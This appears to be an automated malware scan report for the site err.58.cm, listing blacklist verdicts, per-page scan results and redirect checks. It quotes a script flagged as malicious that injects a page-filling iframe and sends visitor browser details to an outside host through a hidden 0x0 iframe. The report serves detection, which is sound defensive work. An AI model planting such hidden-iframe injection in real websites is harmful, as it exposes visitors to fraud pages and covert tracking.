Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=err.58.cm
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://err.58.cm/
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://err.58.cm/ | 200 OK Content-Length: 14573 Content-Type: text/html | clean |
http://js.29hhh.com/head.js | 200 OK Content-Length: 1859 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >");
document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=1500 width=100%></iframe>"); document.writeln("<\/div>"); function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count46.51yes.com/sa.htm?id=463789186'+yesdata+' height=0 width=0></iframe>'); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://count46.51yes.com/sa.htm?id=463789186 <iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count46.51yes.com/sa.htm?id=463789186'+yesdata+' height=0 width=0> | ||
http://err.58.cm/post/?tag=%E7%8F%A0%E4%BF%A1%E5%8F%B0%E6%96%B0%E9%97%BB%E7%9B%B4%E6%92%AD | 200 OK Content-Length: 13451 Content-Type: text/html | clean |
http://err.58.cm/a-1726-1.html | 200 OK Content-Length: 13832 Content-Type: text/html | clean |
http://err.58.cm/post/?tag=%E7%B2%A4%E5%BD%A9%E5%AE%9E%E6%88%98%E8%AE%BA%E5%9D%9B | 200 OK Content-Length: 12266 Content-Type: text/html | clean |
http://err.58.cm/a-1525-1.html | 200 OK Content-Length: 14547 Content-Type: text/html | clean |
http://err.58.cm/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A92008%E5%B9%B4%E9%93%81%E7%AE%97%E7%9B%98 | 200 OK Content-Length: 13410 Content-Type: text/html | clean |
http://err.58.cm/a-1886-1.html | 200 OK Content-Length: 14633 Content-Type: text/html | clean |
http://err.58.cm/post/?tag=%E9%A6%99%E6%B8%AF%E5%85%AD%E5%90%88%E5%BD%A92011%E5%B9%B4125%E6%9C%9F%E4%B8%80%E7%A0%81%E4%BC%9A%E5%91%98%E6%96%99%E5%A4%A7%E5%85%AC%E5%BC%80 | 200 OK Content-Length: 14270 Content-Type: text/html | clean |
http://err.58.cm/a-1459-2.html | 200 OK Content-Length: 15961 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fillseo.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="keywords" content="å²éé·éµå¿çæ»,è马è¯éå¿åéã,é¦æ¸¯å å彩åå²èµ°å¿å¾ä¸è½½,é¦æ¸¯é©¬ä¼ä¸è¯,å©å¾· ...[4178 bytes skipped]... | ||
http://err.58.cm/post/?tag=%E5%86%B2%E9%94%8B%E9%99%B7%E9%98%B5%E5%BF%97%E7%94%9F%E6%AD%BB | 200 OK Content-Length: 12537 Content-Type: text/html | clean |
http://err.58.cm/a-383-1.html | 200 OK Content-Length: 14361 Content-Type: text/html | clean |
http://err.58.cm/post/?tag=%E6%9D%8E%E5%8D%AB%E8%AE%BA%E5%9D%9B | 200 OK Content-Length: 12586 Content-Type: text/html | clean |
http://err.58.cm/a-1499-1.html | 200 OK Content-Length: 14266 Content-Type: text/html | clean |
http://err.58.cm/post/?tag=2000%E5%B9%B4%E5%85%AD%E5%90%88%E5%BD%A9%E7%AC%AC61%E6%9C%9F%E5%BC%80%E4%BB%80%E4%B9%88 | 200 OK Content-Length: 12406 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: err.58.cm
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 01:03:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.14
GET / HTTP/1.1
Host: err.58.cm
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 01:03:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: err.58.cm
Referer: http://www.google.com/search?q=err.58.cm
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: err.58.cm
Referer: http://www.google.com/search?q=err.58.cm
Result:
The result is similar to the first query. There are no suspicious redirects found.